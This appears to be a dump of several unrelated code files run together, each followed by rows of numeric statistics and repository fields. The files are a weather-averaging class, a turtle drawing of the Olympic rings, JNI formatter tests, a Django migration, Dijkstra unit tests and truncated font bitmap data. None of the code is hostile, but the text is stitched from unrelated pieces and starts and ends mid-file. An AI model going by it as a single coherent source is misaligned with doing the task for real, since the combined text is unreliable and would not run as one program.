temperature.append(round(day["temp"]["day"] - 273.15, 2))
return round(sum(temperature) / len(temperature), 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_temperature_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return round(sum(temperature) / len(temperature), 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_pressure_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return int(round(sum(pressure) / len(pressure), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_pressure_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return int(round(sum(pressure) / len(pressure), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_humidity_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return int(round(sum(humidity) / len(humidity), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_humidity_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return int(round(sum(humidity) / len(humidity), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
| 37.219512
| 75
| 0.593578
| 851
| 7,630
| 5.06933
| 0.054054
| 0.05007
| 0.041725
| 0.075104
| 0.980529
| 0.97821
| 0.97821
| 0.97821
| 0.97821
| 0.97821
| 0
| 0.007977
| 0.309961
| 7,630
| 204
| 76
| 37.401961
| 0.811396
| 0
| 0
| 0.880435
| 0
| 0
| 0.080996
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103261
| false
| 0
| 0.005435
| 0
| 0.211957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
317f000dda18a9ea0d519810c8cce68479fd9aee
| 549
|
py
|
Python
|
Scratch_22.py
|
UNKNOWN-CODERS/Olympic-Design-Python-
|
724eb0f19a5129144795c655cc9d84764b069b54
|
[
"Apache-2.0"
] | null | null | null |
Scratch_22.py
|
UNKNOWN-CODERS/Olympic-Design-Python-
|
724eb0f19a5129144795c655cc9d84764b069b54
|
[
"Apache-2.0"
] | null | null | null |
Scratch_22.py
|
UNKNOWN-CODERS/Olympic-Design-Python-
|
724eb0f19a5129144795c655cc9d84764b069b54
|
[
"Apache-2.0"
] | null | null | null |
import turtle
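# Draws the five Olympic rings: blue, black and red on the top row, yellow
# and green offset below, each circle with radius 50 and an 8-pixel pen.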
turtle.pensize(8)
turtle.color('blue')
turtle.penup()
turtle.goto(-110,-25)
turtle.pendown()
turtle.circle(50)
turtle.color('black')
turtle.penup()
turtle.goto(0,-25)
turtle.pendown()
turtle.circle(50)
turtle.color('red')
turtle.penup()
turtle.goto(110,-25)
turtle.pendown()
turtle.circle(50)
turtle.color('yellow')
turtle.penup()
turtle.goto(-55,-75)
turtle.pendown()
turtle.circle(50)
turtle.color('green')
turtle.penup()
turtle.goto(55,-75)
turtle.pendown()
turtle.circle(50)
turtle.done()
| 15.25
| 23
| 0.68306
| 77
| 549
| 4.87013
| 0.272727
| 0.146667
| 0.226667
| 0.28
| 0.770667
| 0.770667
| 0.770667
| 0.757333
| 0.650667
| 0.650667
| 0
| 0.066946
| 0.129326
| 549
| 35
| 24
| 15.685714
| 0.717573
| 0
| 0
| 0.535714
| 0
| 0
| 0.044834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.035714
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31bdda1d4e09ce3bcae6569c576a23ea3cd89f9e
| 13,251
|
py
|
Python
|
wpiformat/wpiformat/test/test_jni.py
|
prateekma/styleguide
|
962c6cd6e316b71156d80e5751e8a76a01b60668
|
[
"BSD-3-Clause"
] | null | null | null |
wpiformat/wpiformat/test/test_jni.py
|
prateekma/styleguide
|
962c6cd6e316b71156d80e5751e8a76a01b60668
|
[
"BSD-3-Clause"
] | null | null | null |
wpiformat/wpiformat/test/test_jni.py
|
prateekma/styleguide
|
962c6cd6e316b71156d80e5751e8a76a01b60668
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from .tasktest import *
from wpiformat.jni import Jni
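# Exercises the wpiformat Jni formatting task: each add_input/add_output pair
# feeds a C++ JNI function through the formatter and checks the generated
# Class/Method/Signature comment block and the argument-line layout.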
def test_jni():
test = TaskTest(Jni())
# Input args go to next line even if they fit on same line
test.add_input("./TestJNI.cpp",
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_TestJNI_testFunc(JNIEnv* env, jclass) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: TestJNI" + os.linesep + \
" * Method: testFunc" + os.linesep + \
" * Signature: ()V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_TestJNI_testFunc" + os.linesep + \
" (JNIEnv* env, jclass)" + os.linesep + \
"{" + os.linesep, True, True)
# Input aligned to "(" and args past end of line
test.add_input("./TestJNI.cpp",
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_setCameraExposureHoldCurrent(JNIEnv* env," + os.linesep + \
" jclass," + os.linesep + \
" jint source) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_cscore_CameraServerJNI" + os.linesep + \
" * Method: setCameraExposureHoldCurrent" + os.linesep + \
" * Signature: (I)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_setCameraExposureHoldCurrent" + os.linesep + \
" (JNIEnv* env, jclass, jint source)" + os.linesep + \
"{" + os.linesep, True, True)
# Args in input on line after "(" and args length > 80 characters
test.add_input("./TestJNI.cpp",
"JNIEXPORT void JNICALL Java_edu_wpi_cscore_CameraServerJNI_putSourceFrame(" + os.linesep + \
" JNIEnv *env, jclass, jint source, jlong imageNativeObj) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_cscore_CameraServerJNI" + os.linesep + \
" * Method: putSourceFrame" + os.linesep + \
" * Signature: (IJ)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_putSourceFrame" + os.linesep + \
" (JNIEnv *env, jclass, jint source, jlong imageNativeObj)" + os.linesep + \
"{" + os.linesep, True, True)
# Args > 80 characters long
test.add_input("./TestJNI.cpp",
"JNIEXPORT jint JNICALL Java_edu_wpi_cscore_CameraServerJNI_createSourceProperty(" + os.linesep + \
" JNIEnv *env, jclass, jint source, jstring name, jint kind, jint minimum," + os.linesep + \
" jint maximum, jint step, jint defaultValue, jint value) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_cscore_CameraServerJNI" + os.linesep + \
" * Method: createSourceProperty" + os.linesep + \
" * Signature: (ILjava/lang/String;IIIIII)I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_createSourceProperty" + os.linesep + \
" (JNIEnv *env, jclass, jint source, jstring name, jint kind, jint minimum," + os.linesep + \
" jint maximum, jint step, jint defaultValue, jint value)" + os.linesep + \
"{" + os.linesep, True, True)
# Ensure fixes clang-format output aligned with "("
test.add_input("./TestJNI.cpp",
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance(JNIEnv*," + os.linesep + \
" jclass) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv*, jclass)" + os.linesep + \
"{" + os.linesep, True, True)
# Idempotence for same code
test.add_input("./TestJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv*, jclass)" + os.linesep + \
"{" + os.linesep)
test.add_latest_input_as_output(True)
# Idempotence for same code with named jclass variable
test.add_input("./TestJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv*, jclass class)" + os.linesep + \
"{" + os.linesep)
test.add_latest_input_as_output(True)
# Check signature that breaks verbose regexes
test.add_input("./NetworkTablesJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntry" + os.linesep + \
" * Signature: (ILjava/lang/String;)I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntry(JNIEnv* env, jclass," + os.linesep + \
" jint inst," + os.linesep + \
" jstring key) {" + os.linesep)
test.add_output("/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntry" + os.linesep + \
" * Signature: (ILjava/lang/String;)I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntry" + os.linesep + \
" (JNIEnv* env, jclass, jint inst, jstring key)" + os.linesep + \
"{" + os.linesep, True, True)
# Function with array type as argument
test.add_input("./NetworkTablesJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntries" + os.linesep + \
" * Signature: (ILjava/lang/String;I)[I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jintArray JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntries(JNIEnv* env," + os.linesep + \
" jclass, jint inst," + os.linesep + \
" jstring prefix," + os.linesep + \
" jint types) {" + os.linesep)
test.add_output("/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntries" + os.linesep + \
" * Signature: (ILjava/lang/String;I)[I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jintArray JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntries" + os.linesep + \
" (JNIEnv* env, jclass, jint inst, jstring prefix, jint types)" + os.linesep + \
"{" + os.linesep, True, True)
# Ensure functions with overloads are handled correctly
test.add_input("./NetworkTablesJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: setRaw" + os.linesep + \
" * Signature: (IJ[BZ)Z" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jboolean JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_setRaw__IJ_3BZ" + os.linesep + \
" (JNIEnv* env, jclass, jint entry, jlong time, jbyteArray value," + os.linesep + \
" jboolean force)" + os.linesep + \
"{" + os.linesep)
test.add_latest_input_as_output(True)
# Ensure text before JNIEXPORT and after args and ")" is handled correctly
# as well as two JNI functions in a row
test.add_input("./TestJNI.cpp",
"/**" + os.linesep + \
" *" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getDefaultInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::GetDefaultInstance();" + os.linesep + \
"}" + os.linesep + \
os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::CreateInstance();" + os.linesep + \
"}" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getDefaultInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getDefaultInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::GetDefaultInstance();" + os.linesep + \
"}" + os.linesep + \
os.linesep + \
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::CreateInstance();" + os.linesep + \
"}" + os.linesep, True, True)
# Handle function declarations properly
test.add_input("./TestJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getDefaultInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getDefaultInstance" + os.linesep + \
" (JNIEnv *, jclass);" + os.linesep + \
os.linesep + \
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv *, jclass)" + os.linesep + \
"{" + os.linesep + \
" return nt::CreateInstance();" + os.linesep + \
"}" + os.linesep)
test.add_latest_input_as_output(True)
# Handle functions whose arguments don't have variable names properly
test.add_input("./DigitalGlitchFilterJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI" + os.linesep + \
" * Method: cleanFilter" + os.linesep + \
" * Signature: (I)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL Java_edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI_cleanFilter" + os.linesep + \
" (JNIEnv *, jclass, jint)" + os.linesep + \
"{" + os.linesep + \
" HAL_CleanFilter(handle);" + os.linesep + \
"}" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI" + os.linesep + \
" * Method: cleanFilter" + os.linesep + \
" * Signature: (I)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_first_wpilibj_hal_DigitalGlitchFilterJNI_cleanFilter" + os.linesep + \
" (JNIEnv *, jclass, jint)" + os.linesep + \
"{" + os.linesep + \
" HAL_CleanFilter(handle);" + os.linesep + \
"}" + os.linesep, True, True)
test.run(OutputType.FILE)
| 49.629213
| 115
| 0.564335
| 1,275
| 13,251
| 5.669804
| 0.11451
| 0.255222
| 0.074561
| 0.122009
| 0.874671
| 0.842025
| 0.827639
| 0.799281
| 0.769678
| 0.754738
| 0
| 0.000537
| 0.297034
| 13,251
| 266
| 116
| 49.815789
| 0.775523
| 0.050864
| 0
| 0.753191
| 0
| 0
| 0.478666
| 0.208884
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004255
| false
| 0
| 0.012766
| 0
| 0.017021
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
735aac3665747d3709eb2fe0b83c5afaced75ec6
| 2,028
|
py
|
Python
|
protein/migrations/0009_auto_20200511_1818.py
|
pszgaspar/protwis
|
4989a67175ef3c95047d795c843cf6b9cf4141fa
|
[
"Apache-2.0"
] | 21
|
2016-01-20T09:33:14.000Z
|
2021-12-20T19:19:45.000Z
|
protein/migrations/0009_auto_20200511_1818.py
|
pszgaspar/protwis
|
4989a67175ef3c95047d795c843cf6b9cf4141fa
|
[
"Apache-2.0"
] | 75
|
2016-02-26T16:29:58.000Z
|
2022-03-21T12:35:13.000Z
|
protein/migrations/0009_auto_20200511_1818.py
|
pszgaspar/protwis
|
4989a67175ef3c95047d795c843cf6b9cf4141fa
|
[
"Apache-2.0"
] | 77
|
2016-01-22T08:44:26.000Z
|
2022-02-01T15:54:56.000Z
|
# Generated by Django 3.0.4 on 2020-05-11 16:18
from django.db import migrations, models
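# Replaces the log_ec50_* float fields on ProteinGProteinPair with nullable
# pec50_* equivalents and relaxes the emax_* and log_rai_* fields to allow
# blank/null values.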
class Migration(migrations.Migration):
dependencies = [
('protein', '0008_auto_20200422_1636'),
]
operations = [
migrations.RemoveField(
model_name='proteingproteinpair',
name='log_ec50_dnorm',
),
migrations.RemoveField(
model_name='proteingproteinpair',
name='log_ec50_mean',
),
migrations.RemoveField(
model_name='proteingproteinpair',
name='log_ec50_sem',
),
migrations.AddField(
model_name='proteingproteinpair',
name='pec50_dnorm',
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='pec50_mean',
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='pec50_sem',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='emax_dnorm',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='emax_mean',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='emax_sem',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='log_rai_mean',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='proteingproteinpair',
name='log_rai_sem',
field=models.FloatField(blank=True, null=True),
),
]
| 30.727273
| 59
| 0.57002
| 178
| 2,028
| 6.325843
| 0.252809
| 0.087922
| 0.273535
| 0.312611
| 0.856128
| 0.856128
| 0.856128
| 0.807282
| 0.611012
| 0.598579
| 0
| 0.031205
| 0.320513
| 2,028
| 65
| 60
| 31.2
| 0.785922
| 0.022189
| 0
| 0.694915
| 1
| 0
| 0.180717
| 0.01161
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016949
| 0
| 0.067797
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b405b039546c23a08559747231d884ab339f14b6
| 2,562
|
py
|
Python
|
dijkstra_last/dijkstra/source/test/my_test.py
|
nickolaymykhalych/UCU_adw_algorithms
|
127b571f1951819569d94e620f23c52c1ffc22db
|
[
"MIT"
] | null | null | null |
dijkstra_last/dijkstra/source/test/my_test.py
|
nickolaymykhalych/UCU_adw_algorithms
|
127b571f1951819569d94e620f23c52c1ffc22db
|
[
"MIT"
] | null | null | null |
dijkstra_last/dijkstra/source/test/my_test.py
|
nickolaymykhalych/UCU_adw_algorithms
|
127b571f1951819569d94e620f23c52c1ffc22db
|
[
"MIT"
] | null | null | null |
import unittest
import sys
sys.path.append("..")
from Graph import Graph
from Dijkstra import *
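# Builds a small weighted graph on nodes A..G and checks dijkstra /
# shortest_path plus the heap-based variant against hand-computed
# shortest distances.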
class Graph_Test(unittest.TestCase):
def setUp(self):
self.graph = Graph()
def test_add_nodes(self):
self.graph.add_node('A')
self.graph.add_node('B')
self.graph.add_node('C')
self.graph.add_node('D')
self.graph.add_node('E')
self.graph.add_node('F')
self.graph.add_node('G')
        self.assertEqual(self.graph.nodes, set(['A', 'B', 'C', 'D', 'E', 'F', 'G']))
    def test_shortest_path(self):
self.graph.add_node('A')
self.graph.add_node('B')
self.graph.add_node('C')
self.graph.add_node('D')
self.graph.add_node('E')
self.graph.add_node('F')
self.graph.add_node('G')
self.graph.add_edge('A', 'B', 10)
self.graph.add_edge('A', 'C', 20)
self.graph.add_edge('B', 'D', 15)
self.graph.add_edge('C', 'D', 30)
self.graph.add_edge('B', 'E', 50)
self.graph.add_edge('D', 'E', 30)
self.graph.add_edge('E', 'F', 5)
self.graph.add_edge('F', 'G', 2)
dijkstra_output = dijkstra(self.graph, 'A')
        self.assertEqual(shortest_path(self.graph, dijkstra_output, 'A', 'E'), (55, ['A', 'B', 'D', 'E']))
        self.assertEqual(shortest_path(self.graph, dijkstra_output, 'A', 'G'), (62, ['A', 'B', 'D', 'E', 'F', 'G']))
    def test_for_one(self):
        self.graph.add_node('A')
        dijkstra_output = dijkstra(self.graph, 'A')
        self.assertEqual(shortest_path(self.graph, dijkstra_output, 'A', 'G'), "There is no sense in your request!")
def test_for_dijkstra_heap(self):
self.graph.add_node('A')
self.graph.add_node('B')
self.graph.add_node('C')
self.graph.add_node('D')
self.graph.add_node('E')
self.graph.add_node('F')
self.graph.add_node('G')
self.graph.add_edge('A', 'B', 10)
self.graph.add_edge('A', 'C', 20)
self.graph.add_edge('B', 'D', 15)
self.graph.add_edge('C', 'D', 30)
self.graph.add_edge('B', 'E', 50)
self.graph.add_edge('D', 'E', 30)
self.graph.add_edge('E', 'F', 5)
self.graph.add_edge('F', 'G', 2)
self.assertEqual(dijkstra_with_heap(self.graph, 'A', 'E'), (55, ['A', 'B', 'D', 'E']))
self.assertEqual(dijkstra_with_heap(self.graph, 'A', 'G'), (62, ['A', 'B', 'D', 'E', 'F', 'G']))
suite = unittest.TestLoader().loadTestsFromTestCase(Graph_Test)
unittest.TextTestRunner(verbosity=2).run(suite)
| 37.676471
| 115
| 0.569087
| 385
| 2,562
| 3.628571
| 0.142857
| 0.302792
| 0.326414
| 0.251969
| 0.758053
| 0.745884
| 0.730852
| 0.730852
| 0.684324
| 0.649964
| 0
| 0.018574
| 0.222482
| 2,562
| 67
| 116
| 38.238806
| 0.682731
| 0
| 0
| 0.666667
| 0
| 0
| 0.050742
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.083333
| false
| 0
| 0.066667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b41c918afea2e642f5c16129b47afcbb982706d1
| 8,115
|
py
|
Python
|
fonts/DejaVuSans_12.py
|
ironss/micropython-lib
|
61719636dad9aaa581c8e39e71ccc515e75c2d43
|
[
"MIT"
] | null | null | null |
fonts/DejaVuSans_12.py
|
ironss/micropython-lib
|
61719636dad9aaa581c8e39e71ccc515e75c2d43
|
[
"MIT"
] | null | null | null |
fonts/DejaVuSans_12.py
|
ironss/micropython-lib
|
61719636dad9aaa581c8e39e71ccc515e75c2d43
|
[
"MIT"
] | 2
|
2019-09-24T13:36:55.000Z
|
2020-04-18T02:05:38.000Z
|
# Code generated by font-to-py.py.
# Font: DejaVuSans.ttf
version = '0.26'
def height():
return 12
def max_width():
return 12
def hmap():
return False
def reverse():
return False
def monospaced():
return False
def min_ch():
return 32
def max_ch():
return 126
_font =\
b'\x06\x00\x02\x00\x72\x01\x1a\x00\x0c\x00\x00\x00\x00\x00\x04\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x7e\x01\x00\x00\x00\x00'\
b'\x05\x00\x0e\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x09\x00\x40\x00'\
b'\x48\x01\xf8\x00\x4e\x00\xc8\x01\x7c\x00\x4a\x00\x08\x00\x00\x00'\
b'\x07\x00\x18\x01\x24\x01\xfe\x07\x24\x01\xc4\x00\x00\x00\x00\x00'\
b'\x0a\x00\x0c\x00\x12\x00\x12\x01\xcc\x00\x30\x00\xcc\x00\x22\x01'\
b'\x20\x01\xc0\x00\x00\x00\x0a\x00\xe0\x00\x9c\x01\x12\x01\x22\x01'\
b'\x44\x01\x80\x00\x40\x01\x20\x01\x00\x00\x00\x00\x03\x00\x0e\x00'\
b'\x00\x00\x00\x00\x04\x00\xfe\x01\x01\x02\x00\x00\x00\x00\x04\x00'\
b'\x03\x03\xfc\x00\x00\x00\x00\x00\x06\x00\x24\x00\x18\x00\x7e\x00'\
b'\x18\x00\x24\x00\x00\x00\x09\x00\x20\x00\x20\x00\x20\x00\xfc\x01'\
b'\x20\x00\x20\x00\x20\x00\x00\x00\x00\x00\x04\x00\x00\x03\x00\x00'\
b'\x00\x00\x00\x00\x04\x00\x20\x00\x20\x00\x20\x00\x00\x00\x04\x00'\
b'\x00\x01\x00\x00\x00\x00\x00\x00\x04\x00\x00\x03\xe0\x01\x3c\x00'\
b'\x06\x00\x07\x00\xfc\x00\x86\x01\x02\x01\x86\x01\xfc\x00\x00\x00'\
b'\x00\x00\x07\x00\x02\x01\x02\x01\xfe\x01\x00\x01\x00\x01\x00\x00'\
b'\x00\x00\x07\x00\x04\x01\x82\x01\x42\x01\x22\x01\x1c\x01\x00\x00'\
b'\x00\x00\x07\x00\x84\x00\x12\x01\x12\x01\x12\x01\xec\x00\x00\x00'\
b'\x00\x00\x07\x00\x60\x00\x50\x00\x48\x00\x44\x00\xfe\x01\x40\x00'\
b'\x00\x00\x07\x00\x1e\x01\x12\x01\x12\x01\x12\x01\xe0\x00\x00\x00'\
b'\x00\x00\x07\x00\xf8\x00\x14\x01\x12\x01\x12\x01\xe2\x00\x00\x00'\
b'\x00\x00\x07\x00\x02\x00\x02\x01\xe2\x00\x1a\x00\x06\x00\x00\x00'\
b'\x00\x00\x07\x00\xec\x00\x12\x01\x12\x01\x12\x01\xec\x00\x00\x00'\
b'\x00\x00\x07\x00\x1c\x01\x22\x01\x22\x01\xa2\x00\x7c\x00\x00\x00'\
b'\x00\x00\x04\x00\x08\x01\x00\x00\x00\x00\x00\x00\x04\x00\x08\x03'\
b'\x00\x00\x00\x00\x00\x00\x09\x00\x60\x00\x60\x00\x60\x00\x90\x00'\
b'\x90\x00\x90\x00\x08\x01\x00\x00\x00\x00\x09\x00\x50\x00\x50\x00'\
b'\x50\x00\x50\x00\x50\x00\x50\x00\x50\x00\x00\x00\x00\x00\x09\x00'\
b'\x08\x01\x90\x00\x90\x00\x90\x00\x60\x00\x60\x00\x60\x00\x00\x00'\
b'\x00\x00\x06\x00\x02\x00\x72\x01\x1a\x00\x0c\x00\x00\x00\x00\x00'\
b'\x0c\x00\xf0\x00\x0c\x03\x04\x02\x62\x04\x92\x04\x92\x04\xf2\x04'\
b'\x86\x02\x44\x00\x78\x00\x00\x00\x00\x00\x07\x00\x00\x01\xe0\x00'\
b'\x5c\x00\x42\x00\x5c\x00\xe0\x00\x00\x01\x08\x00\xfe\x01\x12\x01'\
b'\x12\x01\x12\x01\x12\x01\xec\x00\x00\x00\x00\x00\x08\x00\x78\x00'\
b'\x84\x00\x02\x01\x02\x01\x02\x01\x84\x00\x00\x00\x00\x00\x08\x00'\
b'\xfe\x01\x02\x01\x02\x01\x02\x01\x84\x00\x78\x00\x00\x00\x00\x00'\
b'\x07\x00\xfe\x01\x12\x01\x12\x01\x12\x01\x12\x01\x00\x00\x00\x00'\
b'\x06\x00\xfe\x01\x12\x00\x12\x00\x12\x00\x12\x00\x00\x00\x09\x00'\
b'\x78\x00\x84\x00\x02\x01\x02\x01\x22\x01\x22\x01\xe4\x00\x00\x00'\
b'\x00\x00\x08\x00\xfe\x01\x10\x00\x10\x00\x10\x00\x10\x00\xfe\x01'\
b'\x00\x00\x00\x00\x03\x00\xfe\x01\x00\x00\x00\x00\x03\x00\x00\x04'\
b'\x00\x04\xfe\x03\x07\x00\xfe\x01\x10\x00\x28\x00\x44\x00\x82\x00'\
